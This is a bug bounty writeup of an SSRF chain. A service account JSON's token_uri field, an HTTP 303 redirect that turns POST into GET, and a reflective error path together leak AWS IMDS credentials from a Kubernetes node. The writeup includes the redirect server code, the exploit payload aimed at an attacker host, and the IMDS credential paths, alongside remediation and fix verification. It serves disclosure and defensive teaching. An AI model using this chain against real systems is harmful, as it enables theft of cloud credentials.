A POST to IMDS may fail — but a redirect can quietly turn it into something else.

This writeup documents the chain from a URL typed field inside a service account credential JSON to live AWS IAM credentials on a Kubernetes worker node. The chain depends on four components composing into a single vulnerability. A URL accepting field with no allowlist, an HTTP client with default redirect handling, an unauthenticated metadata service, and an error path that reflected response content. Any one of them, configured differently, breaks the exploit.

The single observation that makes the chain work is when a server-side request forgery can only send POST requests, and the target endpoint only answers GETs, most researchers close the laptop. HTTP 303 See Other, defined in RFC 7231 section 6.4.4 and unchanged since 2014, instructs an RFC compliant HTTP client to convert a POST into a GET when following the redirect. That detail was the difference between a medium-severity SSRF and a full cloud compromise.

None of the components in this chain are bugs on their own. The composition is.

The Feature: A Data Warehouse Integration

The target platform let enterprise customers connect their own data warehouse and sync user data into the platform's engagement graph. A common B2B pattern: the customer provides connection parameters, the platform periodically pulls data across the boundary.

Four warehouse types were supported. Three of them used conventional credentials (username/password, JDBC strings, host plus access token). The fourth accepted a Google Cloud Platform service account JSON document. That fourth option was immediately the most interesting: a GCP service account JSON is not a credential in the traditional sense. It is a configuration document containing multiple URL fields, each of which tells the client library where to make outbound HTTP requests. The most important is token_uri, which specifies the OAuth 2.0 token endpoint where the library sends a signed JWT in exchange for an access token.

When I opened the integration setup page and watched the request to the some_connection endpoint in DevTools, one parameter jumped out:

"security_config": {
  "service_account_creds": "{\"type\":\"service_account\",\"private_key\":\"...\",\"token_uri\":\"https://oauth2.googleapis.com/token\",\"client_email\":\"...\"}"
}

A JSON string embedded inside a JSON object, with token_uri buried inside. The dashboard sent it straight to the server. No client-side URL parse, no allowlist check, no domain restriction. Whatever was typed in the credentials JSON was forwarded verbatim to the backend. The question was whether the backend did any validation of its own.

First Contact: Confirming the SSRF

I set up an Interactsh out-of-band listener and put its URL into token_uri :

"token_uri": "https://[oob-host].oast.pro/REDACTED-probe-1"

Then POSTed to some_connection with a syntactically valid service account JSON: a locally-generated 2048-bit PKCS8 RSA private key, a plausible client_email , and a project / dataset that did not need to exist. Authentication would fail before any real database was contacted.

Within a second, the listener lit up:

POST /REDACTED-probe-1 HTTP/1.1
Host: [oob-host].oast.pro
User-Agent: google-auth/2.x python-requests/2.x
Content-Type: application/x-www-form-urlencoded
grant_type=urn%3Aietf%3Aparams%3Aoauth%3Agrant-type%3Ajwt-bearer&assertion=<JWT>

That one interaction told me several things at once:

1. The server takes token_uri and makes an HTTP request to it. SSRF vector confirmed.

2. The source IP was AWS us-east-1. Matches the platform's infrastructure.

3. The User-Agent identified the client library as Python's google-auth, wrapping the requests session transport.

4. The method was POST, the body was a textbook OAuth 2.0 JWT Bearer exchange. google-auth signs a JWT with the service account's private key, POSTs it to token_uri, and expects back a JSON body with an access_token field.

5. Round-trip time: ~1.5 seconds. Useful for later timing comparisons.

I had a confirmed SSRF. I controlled the destination URL, I knew the exact HTTP method (POST), the body format, and the client library. But a generic outbound-POST bug is where the interesting work starts, not ends.

The Real Target: AWS IMDS

AWS EC2 instances, including Kubernetes worker nodes in most EKS deployments, expose an Instance Metadata Service at `169.254.169.254`. IMDS returns instance metadata and, most importantly, **live temporary AWS credentials for whatever IAM role is bound to the instance's profile.**

The credentials path:

http://169.254.169.254/latest/meta-data/iam/security-credentials/<role-name>

A GET request returns a JSON document with AccessKeyId, SecretAccessKey, and Token. Any AWS SDK in the world accepts those as valid credentials. If the pod could reach IMDS, and my SSRF could make an authenticated HTTP request to that path, I would read live credentials for the EKS node role. Highest-value outcome possible.

I started with the obvious:

"token_uri": "http://169.254.169.254/latest/meta-data/iam/security-credentials/"

Generic warehouse-connection error back. Nothing from IMDS reflected. Same story with role-name guesses in the URL.

The default assumption here is that IMDS is blocked. The Kubernetes network policy forbids pod traffic to 169.254.169.254, or the node's security group drops the connection. In most modern EKS deployments, that assumption is correct. But I had no evidence of what was actually happening. An empty response body is compatible with many failure modes. The right move was an experiment that would reveal where the block lived.

The Timing Oracle

I sent three probes back-to-back, each with a different target in token_uri, and measured the round-trip time on each.

  • External server I controlled (http://[oob-host].oast.pro/) came back in ~1.5 seconds.
  • Unroutable IP (http://10.255.255.1/, RFC 5737 space, no router on earth has a path to it) came back in ~28 seconds.
  • IMDS itself (http://169.254.169.254/...) came back in ~0.34 seconds.

That last number is the one that changed everything, because it is incompatible with a network-layer block. If the Kubernetes network policy or the node's security group were dropping traffic to 169.254.169.254, the response time would have matched the unroutable baseline. Instead it came back in a third of a second, which means the TCP connection succeeded, the HTTP exchange completed, and a response arrived quickly. IMDS was reachable at the network layer. The problem had to be somewhere higher in the stack.

Then the AWS documentation line I had been missing:

IMDS responds with HTTP 405 Method Not Allowed for non-GET requests to metadata paths.

Of course. google-auth was POSTing. IMDS only answered GETs. The POST was getting a 405 with no body. google-auth saw no access token to parse. The integration code caught the exception and returned a generic warehouse error. The SSRF was working perfectly. The protocol on my side (POST) simply did not match the protocol IMDS responds to (GET).

This is where most researchers submit as it is and move on. The correct move is a more specific question: what piece of this system, exactly, is committing to the POST method, and can that commitment be broken?

The Idea: HTTP 303 See Other

The method is decided by the OAuth library. google-auth sends POSTs because that is what the OAuth 2.0 JWT Bearer grant flow specifies. Hardcoded. Not changeable.

But the method is only decided once. After that, the HTTP client takes over, and the HTTP client follows its own rules about redirects. That was the seam.

The testable question: does Python's requests library follow HTTP 303 automatically, and does it rewrite the method per the RFC?

The requests source confirmed it. The relevant logic is in requests.sessions.SessionRedirectMixin.rebuild_method :

if response.status_code == codes.see_other and method != 'HEAD':
    method = 'GET'

requests.Session.send calls self.resolve_redirects by default (allow_redirects=True). Unless the caller explicitly passes allow_redirects=False, a POST-with-303-response gets rewritten to GET against the Location URL automatically. And google-auth's transport uses requests.Session() with no redirect modifications. It calls .send() and parses the final response, whatever it is.

The plan:

  1. Put a URL I control into token_uri.

2. google-auth POSTs to my URL with the signed JWT.

3. My server responds 303 See Other with Location: http://169.254.169.254/latest/meta-data/iam/security-credentials/<role-name>.

4. requests follows the redirect and rewrites POST to GET.

5. IMDS accepts the GET and returns credentials JSON.

6. google-auth fails to parse the response as an OAuth token document and raises RefreshError.

7. If the integration's error path includes the exception string in its response, the IMDS credentials are reflected across the network boundary.

The Full Chain

Before executing the plan, here is the complete flow end-to-end. Each box is a component doing exactly what it was designed to do. Each ⚠ marks a point where a different configuration would have broken the chain.

None

Four ⚠ markers. Four places where a reasonable, widely documented, often recommended configuration change would have broken the chain before it reached the credentials. None of them were applied together. That is the whole finding.

Setting the Trap

I needed a public server with a stable IP that could receive the platform's outbound traffic. My home IP, already confirmed reachable by the Interactsh probe, was fine.

The redirect server was Python standard library:

## Minimal 303 redirect server - listens for incoming POST, responds with Location header
…
…
TARGET = sys.argv[1] if len(sys.argv) > 1 else "http://169.254.169.254/latest/meta-data/iam/info"
class Handler(BaseHTTPRequestHandler):
    def do_POST(self):
        # Log the inbound POST (method, headers, body) for evidence
        ...
        self.send_response(303)
        self.send_header("Location", TARGET)
        self.send_header("Content-Length", "0")
        self.end_headers()
```
Bound to `0.0.0.0:7777`, port-forwarded at the router. Logs inbound requests to stdout, responds with `303 See Other` to whatever path is passed on the command line. Changing the IMDS target was a server restart with different arguments.


The exploit payload against `test_connection`:
```json
{
  "data_warehouse_type": "[REDACTED]",
  "project": "bugbounty-project",
  "dataset": "bugbounty_dataset",
  "security_config": {
    "service_account_name": "svc@[REDACTED].iam.gserviceaccount.com",
    "service_account_creds": "{\"type\":\"service_account\",\"private_key\":\"<PKCS8 RSA KEY>\",\"token_uri\":\"http://[attacker-ip]:7777/creds\",\"client_email\":\"svc@[REDACTED].iam.gserviceaccount.com\",\"universe_domain\":\"googleapis.com\"}"
  }
}

The private_key is a locally-generated 2048-bit RSA key. It does not correspond to any real GCP service account. google-auth uses it only to sign the outbound JWT, and since the OAuth server it talks to is actually my redirect script, the signature is never validated. The key just needs to parse as PKCS8 PEM. client_email and universe_domain similarly exist only to make the JSON parse cleanly. The entire blob is syntactically valid GCP-format JSON.

First Shot

For the first test, I pointed the redirect at /latest/meta-data/iam/info rather than the credentials path. Two reasons, I did not know the IAM role name yet (needed it to build the correct security-credentials/<role> URL), and /iam/info returns harmless metadata instead of credentials (safer first payload for validation).

Redirect server started, some_connection fired. About 1.4 seconds later:

{
  "result": "error",
  "message": "Error connecting to warehouse: Error executing SQL due to customer config: ('No access token in response.', {'Code': 'Success', 'LastUpdated': '2026-04-02T03:28:39Z', 'InstanceProfileArn': 'arn:aws:iam::[REDACTED-ACCOUNT]:instance-profile/[REDACTED-ROLE]', 'InstanceProfileId': '[REDACTED]'})"
}

Read that slowly. No access token in response. is google-auth's error when token_uri doesn't parse as an OAuth token document. The Python dict that follows it, containing Code, LastUpdated, InstanceProfileArn, and InstanceProfileId , is the literal body of the IMDS response, parsed as JSON by google-auth and serialized back as a dict repr() when the exception was formatted.

Three things became simultaneously true: the 303 redirect chain worked, the IMDS response body was reflected across the network boundary, and I now knew the AWS account number and the IAM role name.

My redirect server confirmed the transaction:

POST /creds HTTP/1.1
User-Agent: google-auth/2.17.3 python-requests/2.31.0
Content-Type: application/x-www-form-urlencoded
Body: grant_type=urn%3Aietf%3Aparams%3Aoauth%3Agrant-type%3Ajwt-bearer&assertion=eyJhbGc...
Response: 303 → http://169.254.169.254/latest/meta-data/iam/info

google-auth making its OAuth POST, receiving the 303, transparently following the redirect to IMDS as the RFC specifies. The exploit was live.

Getting the Credentials

Restarted the redirect server pointed at the role-specific credentials path:

python3 redirect.py "http://169.254.169.254/latest/meta-data/iam/security-credentials/[REDACTED-ROLE]"

Fired some_connection again. The response, reproduced verbatim because this is the finding in one body:

{
  "result": "error",
  "message": "Error connecting to warehouse: 
Error executing SQL due to customer config: 
('No access token in response.', 
{'Code': 'Success', 'LastUpdated': '2026-04-02T03:42:08Z', 'Type': 'AWS-HMAC', 
'AccessKeyId': 'ASIA[REDACTED]', 'SecretAccessKey': '[REDACTED]', 
'Token': 'IQoJb3JpZ2luX2VjE[REDACTED]', 'Expiration': '2026-04-02T09:43:36Z'})"
}

Live AWS temporary credentials for the Kubernetes worker node role. Access key, secret access key, session token, expiration. Wrapped in AWS-HMAC, which any AWS SDK accepts.

Per the program's rules of engagement, I did not use these credentials to make any AWS API calls. The rules forbid viewing data beyond what is needed to prove the bug. The credentials were the proof. Using them would have been a rules violation. One additional probe confirmed the instance identity:

{
  "accountId": "[REDACTED]",
  "availabilityZone": "us-east-1a",
  "imageId": "ami-[REDACTED]",
  "instanceId": "i-[REDACTED]",
  "instanceType": "c6i.8xlarge",
  "region": "us-east-1"
}

Real AWS account. Real AMI. A 32-vCPU compute-optimized node. Production-grade infrastructure, not a sandbox.

Four Aligned Failures

The chain worked because four things were simultaneously true. Fixing any one breaks the exploit. Fixing all four makes the platform resilient.

1. token_uri was not validated against an allowlist. The service account JSON was treated as opaque customer configuration. No check that the URL pointed to a Google-controlled domain, no scheme restriction, no RFC 1918 or link-local block. This is the primary failure and the easiest fix.

2. requests.Session followed redirects by default, including 303 with method rewriting. General-purpose HTTP client behavior. allow_redirects=True is the default on every method, and google-auth does not override it. RFC-compliant. No bug in either library. This is a composition hazard, not a library vulnerability.

3. IMDSv1 was enabled and reachable from the pod. No TTL token requirement, and the Kubernetes network policy allowed pod traffic to 169.254.169.254. AWS has been urging customers to switch to IMDSv2-required mode for years, and this finding demonstrates why. Even basic HttpTokens: required breaks the chain: the attacker cannot do the PUT-first token exchange via a one-shot requests.get() after a redirect.

4. The error path reflected the raw exception string. Without this, the SSRF degrades to blind, requiring timing or size inference. With it, the read is fully content-disclosing: whatever IMDS path the redirect targets comes back in the error message. The hardest component for developers to notice because verbose error output is usually considered good developer experience.

Remediation and Verification

A week after reporting, I came back to verify the fix.

Same payload, fresh session, new account, redirect server on the same IP. The response:

{
  "error": "... Untrusted token_uri in service account credentials: http://[attacker-ip]:7777/creds. Only standard Google OAuth2 token endpoints are allowed: frozenset({'https://oauth2.googleapis.com/token', 'https://accounts.google.com/o/oauth2/token'})"
}

HTTP 400. Blocked at input validation.

A legitimate token_uri (https://oauth2.googleapis.com/token) confirmed the fix did not break valid usage: HTTP 201 Created, source provisioned. The downstream connection still failed for a different reason (the synthetic credentials were not real), but token_uri no longer triggered rejection.

The right fix. Allowlist approach, implemented at the field-parsing layer, so any new code path touching the same service account JSON inherits the protection. They did not pursue allow_redirects=False in google-auth, which is fine: the allowlist makes redirect behavior moot. The frozenset(…) in the error message tells me the check lives in the Python worker layer, which is the correct place.

Vulnerability closed.

The single observation I want to leave for anyone reading this, defender or researcher :

Make an outbound HTTP request to this URL is the single most dangerous feature a web application can expose. Treat every field that accepts one as if it were `eval()` of a URL, because functionally, that is what it is.

Every time. Every field. Every integration. Every just pass it through to the library.

This chain was a composition hazard dressed up as a configuration option. It was waiting in the schema of a well-known OAuth credential format for anyone who looked at the token_uri field and asked what it does. It was patched quickly and correctly. And it will exist, in some other form, in some other product, next week, until the pattern itself becomes unthinkable. Until then, the job is unchanged. Read the code. Time the requests. Question the composition. Push past the first error response. Assume reflection. Try 303.

When a primitive gives you the wrong verb, do not give up on the primitive. Give up on the verb.